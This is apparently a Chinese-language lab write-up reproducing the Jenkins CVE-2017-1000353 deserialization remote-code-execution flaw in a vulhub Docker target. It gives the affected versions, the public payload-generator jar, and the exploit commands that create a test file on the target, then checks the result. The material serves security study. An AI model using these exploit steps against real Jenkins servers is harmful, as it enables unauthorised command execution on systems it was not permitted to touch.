(vulhub靶场无法反弹shell,实战有待测试)
所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令。
名称 | IP |
---|---|
攻击机 | 192.168.159.174 |
靶机 | 192.168.159.129 |
首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可
cd vulhub-master/jenkins/Jenkins/CVE-2017-1000353
docker-compose up -d
首先准备好生成payload的工具:CVE-2017-1000353-1.1-SNAPSHOT-all.jar
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
https://github.com/vulhub/CVE-2017-1000353
准备好上述工具后将CVE-2017-1000353-1.1-SNAPSHOT-all.jar放入CVE-2017-1000353-master文件夹下,在该文件夹下打开终端:
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
python exploit.py http://192.168.159.129:8080 jenkins_poc.ser
然后回到我们的靶机中打开终端输入:
#909ba1b71d9b为我们启动的靶场id
docker ps -a
docker exec -it 909ba1b71d9b /bin/bash
ls tmp
可以看到如下图,文件创建成功,此漏洞利用成功